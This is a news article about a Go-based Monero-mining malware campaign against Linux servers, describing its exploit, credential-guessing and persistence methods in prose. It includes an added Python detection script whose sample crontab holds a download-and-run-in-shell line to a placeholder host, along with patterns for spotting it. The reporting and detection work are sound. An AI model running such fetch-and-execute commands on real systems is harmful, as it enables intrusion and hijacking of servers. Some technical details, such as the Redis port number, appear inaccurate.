New Malware Scours Linux Servers for Monero
A new type of cryptomining malware, dubbed Golang, has been identified; it is set up to fraudulently mine Monero (XMR) cryptocurrency on Linux servers.
Several cybersecurity companies have released reports on the new malware, called Golang, which is capable of infecting Linux servers using a range of infection tactics.
Josh Grunzweig, a cybersecurity researcher with Palo Alto Networks' Unit 42, believes that new malware written in the Go language has been appearing in recent months, most of it targeting the Microsoft Windows operating system.
Grunzweig gathered more than 10,000 unique samples of Go-compiled malware and concluded that the most common malware families were Veil, GoBot2, and Hercules. Pentesting tools, Remote Access Trojans (RATs), and backdoors were the most common kinds of tool being developed.
Trend Micro researchers Augusto Remillano II and Mark Vicente said the propagator was being used to insert a cryptocurrency miner payload.
Golang was first detected in May and specifically targets Linux servers. The code looks for vulnerabilities in the system as well as entry points through which it can spread across networks.
According to F5 researchers, Golang has 7 propagation methods: “4 exploits targeting web applications (2 exploits targeting ThinkPHP, 1 targeting Drupal, and 1 targeting Confluence), enumeration of SSH credentials, enumeration of Redis database credentials, and attempts to connect other machines using found SSH keys.”
The malware first sends a GET request to http://ident.me, a service that returns the public IP address of the server. That address is then used to build a list of IP addresses in the same Class B range, which the malware scans on ports 80, 20, 8090, and 6397. A malicious request is then sent to any open port it finds, directing the target to download a payload from Pastebin.
Against Confluence, the malware exploits the CVE-2019-3396 vulnerability, which cryptocurrency mining malware has exploited in the past.
In the Redis attack, if no open ports are detected, the malware goes on to try simple passwords (such as admin, root, redis, and test) in order to establish a connection to a weakly secured server.
Golang then wipes the existing database with the FLUSHALL Redis command and creates a scheduled task in its place that downloads the payload.
The propagator also disables all security tools and software, clears histories and logs, and looks for other cryptocurrency mining operations already running so that it can terminate them, keeping all CPU power for its own mining. Any process consuming more than 30 percent of the available memory is also terminated.
Golang installs itself on the system as a cron job and a service named mysqlc. The download script is then verified and re-executed every 15 minutes.
The malware blocks outgoing traffic on ports 3333, 5555, 7777, and 9999, as these ports are used by other crypto mining operations.
Golang uses the popular XMRig 2.13.1 Monero mining software. F5 traced the malware to several public mining pools, where under $2,000 has been earned so far. “However, this information is based only on the wallets our specific miners were using. It could be that the attacker has several wallets used by different parts of his botnet.”
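The host-level indicators described above (a 15-minute cron job piping a download into a shell, a service named mysqlc, and outbound blocks on the miner-pool ports) can be checked from saved command output. The following triage script is an added example, not code from the article or from F5; the crontab, iptables-save and ps samples are constructed, and the Pastebin-style URL in them is a placeholder.

```python
import re

# Constructed sample outputs standing in for `crontab -l`, `iptables-save`
# and `ps -eo pid,pmem,comm` captured on a suspect Linux host.
SAMPLE_CRONTAB = """\
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
*/15 * * * * curl -fsSL http://paste-placeholder.invalid/raw/XXXX | sh
"""
SAMPLE_IPTABLES = """\
*filter
-A OUTPUT -p tcp -m tcp --dport 3333 -j DROP
-A OUTPUT -p tcp -m tcp --dport 5555 -j DROP
-A OUTPUT -p tcp -m tcp --dport 7777 -j DROP
-A OUTPUT -p tcp -m tcp --dport 9999 -j DROP
-A OUTPUT -p tcp -m tcp --dport 443 -j ACCEPT
COMMIT
"""
SAMPLE_PS = """\
  PID %MEM COMMAND
    1  0.1 systemd
 4242 45.3 mysqlc
 4300  1.2 sshd
"""

MINER_POOL_PORTS = {3333, 5555, 7777, 9999}  # outbound ports the malware blocks (per the article)
SERVICE_NAME = "mysqlc"                       # cron job / service name the malware installs

def suspicious_cron_entries(crontab):
    """Cron lines that run every 15 minutes and pipe a curl/wget download into a shell."""
    pat = re.compile(r"^\*/15 .*\b(curl|wget)\b.*\|\s*(ba)?sh\b")
    return [l for l in crontab.splitlines() if pat.search(l)]

def blocked_pool_ports(iptables_save):
    """Miner-pool ports that appear in outbound DROP/REJECT rules."""
    pat = re.compile(r"^-A OUTPUT .*--dport (\d+) -j (?:DROP|REJECT)\b")
    found = {int(m.group(1)) for l in iptables_save.splitlines() if (m := pat.match(l))}
    return sorted(found & MINER_POOL_PORTS)

def miner_processes(ps_output):
    """(pid, %mem) of running processes whose command name matches the malware's service."""
    procs = []
    for line in ps_output.splitlines()[1:]:  # skip the ps header line
        parts = line.split()
        if len(parts) == 3 and parts[2] == SERVICE_NAME:
            procs.append((int(parts[0]), float(parts[1])))
    return procs

def triage(crontab, iptables_save, ps_output):
    """Aggregate the three checks; any non-empty field is a reason to investigate the host."""
    return {"cron": suspicious_cron_entries(crontab),
            "blocked_ports": blocked_pool_ports(iptables_save),
            "processes": miner_processes(ps_output)}

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_CRONTAB, SAMPLE_IPTABLES, SAMPLE_PS).items():
        print(f"{name}: {hits}")
```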
It was found that the potential author of the malware goes by the username of “Nidaye222.” “Ni da ye” has a double meaning in Chinese, either uncle or something rude, depending on the context.
F5 researchers traced a “GitHub profile with the same username that was created a couple of days prior to this writing. That user recently forked an open source vulnerability detection system. It is possible that this is a research hub for the malicious actor where he or she could be experimenting with additional exploits in order to expand the current campaign.”
Although Golang is not among the most sophisticated malware in the crypto scene, the sheer number of its propagation methods, simple as they are, shows that the creator favours quantity over quality. Alas, this will probably not be the last time we hear about Golang.